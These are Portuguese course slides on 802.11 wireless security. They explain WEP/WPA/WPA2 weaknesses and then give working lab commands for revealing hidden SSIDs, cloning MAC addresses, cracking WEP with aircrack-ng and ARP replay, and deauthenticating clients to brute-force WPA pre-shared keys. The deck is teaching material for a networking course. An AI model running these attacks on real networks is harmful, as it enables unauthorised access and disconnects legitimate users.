1. Tecnologia em Redes de
Computadores
Gerência de Redes
Prática de Ataques - wireless
Professor: André Peres
andre.peres@poa.ifrs.edu.br
Instituto Federal do Rio Grande do Sul - IFRS
Porto Alegre
2. Enlace IEEE 802.11
Existem 3 tipos de enlace
IBSS (Independent Basic Service Set) = ad-hoc
BSS (Basic Service Set)
ESS (Extended Service Set)
3. Enlace IEEE 802.11
IBSS ou ad-hoc
Criada de maneira espontânea
Área de abrangência pequena
Sem controle centralizado
4. Enlace IEEE 802.11
BSS
Controle centralizado (AP – Access Point)
• Concentrador (hub) para rede sem fios
• Comutador (switch) entre enlaces com/sem fio
• Área de abrangência definida pelo AP
6. Enlace IEEE 802.11
Ligação entre redes:
Pode utilizar BSS ou IBSS
Com BSS
• Um AP
• Dois APs (um é configurado como cliente)
7. Enlace IEEE 802.11
Nível de enlace IEEE 802.11
Controle de comunicação de nível físico
Baseado no padrão IEEE 802.3 (ethernet)
Utiliza endereços MAC compatíveis com ethernet
Controle de acesso ao meio: CSMA/CA
Controle de erros tipo stop-and-wait
8. Enlace IEEE 802.11
Para conexão de uma estação com a rede
Deve respeitar uma máquina de estados:
9. Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
• Tipo de rede (BSSType)
– Ad-hoc
– Infra estrutura (BSS)
– Qualquer
• Nome da rede (SSID)
– Uma rede específica
– Qualquer rede
10. Enlace IEEE 802.11
Para conexão de uma estação com a rede
Configuração da placa cliente
• Tipo de descoberta da rede (scan type)
– Passivo → aguarda beacon frames
– Ativo → utiliza probe request
• Canal a ser utilizado (channel)
– Especifica um canal 1 → 11
– Qualquer canal (faz varredura de todos em busca da rede)
11. Enlace IEEE 802.11
Para conexão de uma estação com a rede
A estação deve “encontrar” a rede
• O AP divulga sua existência através de beacon frames
12. Enlace IEEE 802.11
Para conexão de uma estação com a rede
• Por segurança o AP pode não divulgar o nome da rede,
obrigando a estação a utilizar probe request
13. Enlace IEEE 802.11
Para conexão de uma estação com a rede
• O AP responde ao Probe Request com um Probe
Response:
14. Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a identificação do SSID e troca de mensagens
iniciais
• Estado 1 → Não autenticado, Não associado
Passa-se para a fase de autenticação
• Padrão inicial:
– Open System
– Shared Key (WEP)
• Adicionados Posteriormente:
– PSK - Pre-Shared Key (WPA, WPA2)
– 802.1x (WEP, WPA, WPA2)
15. Enlace IEEE 802.11
Autenticação Open System
Autenticação nula
Qualquer estação é autenticada por padrão
Protocolo:
1 → Estação envia uma requisição de autenticação
2 → AP aceita a autenticação (sempre successfull)
16. Enlace IEEE 802.11
Autenticação Shared Key
Utiliza WEP com texto desafio
• O WEP utiliza criptografia simétrica (chave única)
17. Enlace IEEE 802.11
Autenticação Pre-Shared Key
Similar ao Shared Key
A chave é utilizada apenas na autenticação
Autenticação 802.1x
Necessita de um servidor RADIUS
O AP serve como um NAS (Network Access Server)
A comunicação ocorre entre cliente e servidor RADIUS
O servidor RADIUS informa ao AP o resultado da
autenticação
18. Enlace IEEE 802.11
Para conexão de uma estação com a rede
Após a autenticação
• Estado 2 → Autenticado, Não associado
Fase de associação
• Passagem automática do estado 2 → 3
• Estado 3 → Autenticado, Associado
• Agora a estação pode receber/transmitir quadros de
enlace na rede
• Acesso ao servidor DHCP, etc...
19. Segurança IEEE 802.11
A autenticação faz parte do processo de
segurança
Após a autenticação, a estação passa para o
estado de autenticado/associado
Somente neste estado, a estação pode trocar
quadros de enlace com a rede
20. Segurança IEEE 802.11
Criptografia
WEP (Wired Equivalent Privacy)
• Baseia-se na dificuldade do atacante em obter um
segredo compartilhado entre as estações
• Utiliza criptografia simétrica
– Mesma chave para cifragem e decifragem de quadros
• Baseado no algoritmo RC4
– Não é uma implementação pura do RC4
– Foram feitas modificações...
23. Segurança IEEE 802.11
WEP
Criptografia simétrica utilizando operações XOR
Necessita de uma chave com o mesmo tamanho da
mensagem (inviável)
Para contornar este problema utiliza o gerador de
números pseudo-aleatórios (PRNG) do RC4
Funcionamento: utiliza uma SEMENTE secreta para
gerar a chave de cifragem do mesmo tamanho da
mensagem
24. Segurança IEEE 802.11
WEP
A chave não pode ser reaproveitada em dois quadros
MSG [XOR] CIF → CHAVE
Se atacante insere ou conhece a mensagem original
e captura mensagem cifrada, obtém a chave utilizada
26. Segurança IEEE 802.11
WEP
Necessária chave única, para cada quadro de enlace
Quadros de até 3000 bytes a 54 Mbps = muitas
chaves diferentes por segundo
Uma semente gera uma chave...
A mesma semente deve ser utilizada por todas as
estações
27. Segurança IEEE 802.11
WEP
Solução → utilização de um vetor de inicialização em
conjunto com a semente
IV (Initialization Vector) → 24 bits randômicos
• Deve ser divulgado para a estação que irá decifrar o
quadro
30. Segurança IEEE 802.11
WEP
O segredo permanece o mesmo, enquanto o IV é
alterado a cada quadro de enlace
IV → 24 bits
Segredo → 5 bytes → 40 bits = WEP64
Segredo → 13 bytes → 104 bits = WEP128
31. Segurança IEEE 802.11
Problemas do WEP
Utilização de chaves repetidas
IV → 24 bits → 224 combinações
Quadros de 1500 bytes a 11 Mbps
(1500 x 8 x 224) / (11 x 106)= 1800 segundos
Aproximadamente 5 horas
Excluindo possibilidade de 2 máquinas utilizarem o
mesmo IV.... .... ...
32. Segurança IEEE 802.11
Problemas do WEP
Os bits permanecem na mesma posição do quadro...
• Se atacante deseja alterar um bit, basta inverter o seu
valor
• Além disso, deve identificar a alteração no CRC32
Se atacante captura uma chave, já pode gerar
pacotes falsos na rede utilizando esta chave/IV
33. Segurança IEEE 802.11
Problemas do WEP
Pesquisa de Fluhrer, Mantin, Shamir
“Weaknesses in the key scheduling Algorithm of RC4”
Possíveis chaves fracas no PRNG do RC4
Ao utilizar uma chave fraca, identifica bits da semente
O WEP utiliza muitas sementes diferentes, gerando
muitas chaves fracas
34. Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort
Total de pacotes: 2,5 milhões
Pacotes “interessantes”: 1878
Segredo: xC513
35. Segurança IEEE 802.11
Problemas do WEP
Programas WEPCrack e AirSnort
Total de pacotes: 7,3 milhões
Pacotes “interessantes”: 4160
Segredo: xCd513ewq1pkm
36. Segurança IEEE 802.11
Problemas do WEP
Análise dos bits iniciais de uma mensagem cifrada
• O LLC inclui sempre os mesmos bits: 0xaa
Inferir através de análise probabilística os bits da
semente (os primeiros bits são o IV)
Isto facilita a descoberta dos demais bits da semente
(segredo compartilhado)
37. Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Após descoberta das vulnerabilidades WEP
Criado grupo de trabalho IEEE 802.11i
• Responsável pelo novo protocolo de segurança 802.11
• Reuniões entre fabricantes e comunidade científica
Fornecedores preocupados
• Demora com 802.11i
• Criada Wi-Fi Alliance
• Necessidade de compatibilidade com hardware antigo
• Apenas atualização de firmware
38. Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
Para manter o hardware → novo esquema rodando
sobre protocolo antigo (WEP)
Protocolo WPA (ano: 2002)
• Mantém o WEP
• Contém mecanismo de troca de segredo (parte da
semente além do IV) periodicamente → TKIP
(Temporal Key Integrity Protocol)
• Permite autenticação via PSK ou 802.1x
39. Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
MICHAEL
• Substitui o CRC32 para verificação de integridade de
mensagens
• Gera um cálculo de 64 bits
• Serve para impedir que um atacante consiga inserir
quadros em uma rede cifrada
40. Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
TKIP
• Troca dinâmica de segredo
• Necessita de um novo mecanismo de autenticação
• Como o segredo é trocado, não pode utilizar a chave dinâmica
como autenticação (o cliente não conhece a chave)
PSK (Pre-Shared Key)
• Chave “mestra” utilizada no processo de autenticação
• Utilizada inicialmente para ingresso na rede
• Após autenticação, estação recebe a chave que está sendo
utilizada pelas demais estações na rede
41. Segurança IEEE 802.11
WPA (Wi-fi Protected Access)
PSK (Pre-Shared Key)
• É o ponto pelo qual um atacante tenta obter acesso à
rede
• Atacante captura processo de autenticação e tenta
identificar a PSK utilizada neste processo
• Ao obter a PSK, consegue entrar na rede
• Como o número de quadros trocados na autenticação é
pequeno, o ataque deve ser baseado em força bruta
• Força bruta → dicionário de senhas + software de
análise da autenticação WPA
42. Segurança IEEE 802.11
WPA + 802.1x
• Alternativa ao PSK
• Não possui chave inicial
• Usuário deve se autenticar com servidor RADIUS
– PEAP (usuário/senha)
– Certificado
– …
• Necessário servidor RADIUS
• AP serve como ponte entre estação e RADIUS
43. Segurança IEEE 802.11
802.1x
• Baseado no conceito de “portas”
– Enquanto a estação não finaliza o processo de autenticação fica com a
“porta” para a rede fechada
– A única comunicação permitida é com o servidor RADIUS
– Apenas no final da autenticação com sucesso (indicada pelo servidor
RADIUS para o AP) o AP libera o acesso
• Processo de autenticação ocorre no nível de enlace
54. Segurança IEEE 802.11
802.1x
• No caso de uso de certificados, apenas quem possui
certificado válido (CA) pode acessar a rede
• No caso de EAP, verificado usuário/senha
– Possibilidade de força bruta
• O AP é autenticado junto ao RADIUS, impedindo AP
falso
• Possibilidade de ataques com AP+RADIUS falsos
– Atacante realiza a autenticação do cliente
– Não funciona com TLS (autenticação mútua AP ↔ Estação) via
certificados
55. Segurança IEEE 802.11
WPA2 (IEEE 802.11i)
Ano: 2004
Substituição total do protocolo criptográfico
Utilização do AES(Advanced Encryption Standard)
• Robusto
• Sem ataques à criptografia conhecidos
• Padrão de criptografia adotado por diversos
softwares/equipamentos
Incompatível com equipamentos anteriores
Autenticação via PSK e 802.1x, Criptografia AES
59. Ataques
Visão do atacante:
3. mecanismos adicionais
nenhum
Filtro MAC
SSID escondido
Mecanismos layer 3 (firewall, etc...)
60. Ataques
Cenários de testes:
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
2 – WEP
Ataque: quebra do WEP via software
3 – WPA
Ataque: desconexão de um cliente + captura
de autenticação + força bruta
61. Ataques
1 – AP com SSID escondido e filtro de MAC
Ataque: captura de probes + clonagem de
MAC
Passos:
Descoberta do SSID:
- colocar a placa de redes sem fios em modo
monitor
- capturar tráfego via wireshark, tcpdump,
etc....
62. Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
63. Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up
Executar o wireshark e aguardar os “probes”
64. Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o nome da rede:
65. Ataques
1 – AP com SSID escondido e filtro de MAC
Buscar por pacotes de probe (OK)
Buscar pelo MAC address de uma estação que
está navegando
Identificar faixa de endereços IP utilizados e
buscar por um IP que não está sendo usado
Objetivo:
Mesmo MAC, IP diferente....
66. Ataques
1 – AP com SSID escondido e filtro de MAC
Configurando o AP
67. Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:
- placa em modo monitor
- wireshark...
68. Ataques
1 – AP com SSID escondido e filtro de MAC
Obtendo o MAC de uma estação da rede:
69. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
Atacante Alvo
... ...
AP
10.1.1.1 10.1.1.2 IP
AA:AA AA:AA MAC MAC
Físico Físico Físico Físico
70. Ataques
1 – AP com SSID escondido e filtro de MAC
Alvo envia um quadro
Clonagem de MAC: AP verifica MAC origem
Atacante Alvo OK !
... ...
AP
10.1.1.1 10.1.1.2 IP
AA:AA AA:AA MAC MAC
Físico Físico Físico Físico
MAC D | MAC O | IP O | IP D
OK !
11:11 AA:AA 10.1.1.2 200.1.1.1
71. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
Atacante Alvo Volta a resposta
... ...
AP
10.1.1.1 10.1.1.2 IP
AA:AA AA:AA MAC MAC
Físico Físico Físico Físico
MAC D | MAC O | IP O | IP D
AA:AA 11:11 200.1.1.1 10.1.12
72. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC: As duas placas de
Atacante Alvo rede aceitam...
e repassam para o IP
... ...
AP
10.1.1.1 10.1.1.2 IP
AA:AA AA:AA MAC MAC
Físico Físico Físico Físico
MAC D | MAC O | IP O | IP D
AA:AA 11:11 200.1.1.1 10.1.12
73. Ataques
IP destino = 10.1.1.1?
1 – AP com SSID escondido e filtro de MAC NÃO !
Eu sou um roteador?
Clonagem de MAC: NÃO !
Atacante Alvo → descarta o pacote !!!
... ...
AP
10.1.1.1 10.1.1.2 IP
AA:AA AA:AA MAC MAC
Físico Físico Físico Físico
MAC D | MAC O | IP O | IP D
AA:AA 11:11 200.1.1.1 10.1.12
74. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC:
Ou seja...
Duas máquinas com mesmo MAC e IP's
diferentes podem “navegar” simultaneamente
(layer3)
… afinal é possível ter uma máquina com mais
de um IP vinculado na mesma placa de rede....
75. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
# killall nm-applet
# ip l s wlan0 down
# ip l s wlan0 address 00:1b:77:b9:51:49
# ip a a 10.1.0.200/24 dev wlan0
# ip l s wlan0 up
# iwconfig wlan0 essid sectest ap 00:1c:f0:63:a8:7e channel 8
# tail -f /var/log/syslog
---------------------------------
kernel: [ 225.723137] wlan0: waiting for beacon from 00:1c:f0:63:a8:7e
kernel: [ 225.757365] wlan0: beacon received
kernel: [ 225.783319] wlan0: associate with 00:1c:f0:63:a8:7e (try 1)
kernel: [ 225.785939] wlan0: RX AssocResp from 00:1c:f0:63:a8:7e (capab=0x401
status=0 aid=1)
kernel: [ 225.785943] wlan0: associated
76. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
- não utilizar o serviço de DHCP...
- configurar na mão:
→ roteador default
→ servidor de DNS
77. Ataques
1 – AP com SSID escondido e filtro de MAC
Clonagem de MAC e associação com AP:
78. Ataques
2 – Quebra de WEP via software
Vulnerabilidade – PRNG do RC4 gerando
chaves fracas...
Técnica:
1. captura de pacotes cifrados com diferentes
IVs
2. análise dos pacotes (software) para
obtenção do segredo compartilhado
79. Ataques
2 – Quebra de WEP via software
Passos:
1. colocar a placa de rede em modo monitor
para captura do tráfego cifrado:
# ip l s wlan0 down
# iwconfig wlan0 mode monitor
# iwconfig wlan0 channel 8
# ip l s wlan0 up
80. Ataques
2 – Quebra de WEP via software
Passos:
2. instalação do software aircrack-ng
# apt-get install aircrack-ng
3. captura do tráfego (descoberta das redes)
# airodump-ng wlan0
81. Ataques
2 – Quebra de WEP via software
Passos:
4. em outro terminal – captura do tráfego
cifrado de uma rede específica para posterior
análise
# airodump-ng --channel 8 --bssid 00:1C:F0:63:A8:7E -w wep1
wlan0
5. para diminuir tempo, geração de tráfego
(requisição de autenticação com o AP)
# aireplay-ng -1 0 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0
82. Ataques
2 – Quebra de WEP via software
Passos:
6. captura da requisição de autenticação (os
pacotes ARP) e repetição dos mesmos para
geração de mais tráfego
# aireplay-ng -3 -e sectest -a 00:1C:F0:63:A8:7E -h 00:26:C7:6E:42:62
wlan0
7. Após obter um número significativo de
pacotes, tentar a análise...
# aircrack-ng -b 00:1C:F0:63:A8:7E wep1-01.cap
83. Ataques
2 – Quebra de WEP via software
Obs: necessário grande volume de tráfego
para análise...
porém, com tráfego suficiente, sempre se
consegue o segredo compartilhado
84. Ataques
3 – Quebra de WPA via software
Vulnerabilidade:
Mesmo protocolo de autenticação do WEP
quando utilizado PSK
Técnica:
Obtenção dos quadros de associação e
posterior força bruta na PSK
85. Ataques
3 – Quebra de WPA via software
Passos:
1. colocar a placa de rede em modo monitor
2. monitorar com airodump-ng
3. captura de pacotes cifrados (especificar
WPA)
# airodump-ng --channel 8 -w wpa --bssid 00:1C:F0:63:A8:7E -w wpa1 wlan0
86. Ataques
3 – Quebra de WPA via software
Passos:
4. força a desautenticação de um cliente para
captura dos quadros de autenticação (falsifica
mensagem de desaut. do AP)
# aireplay-ng -0 5 -a 00:1C:F0:63:A8:7E wlan0
5. utiliza força bruta (dicionário) para tentar
obter PSK
# aircrack-ng -w dicionario.txt wpa1-01.cap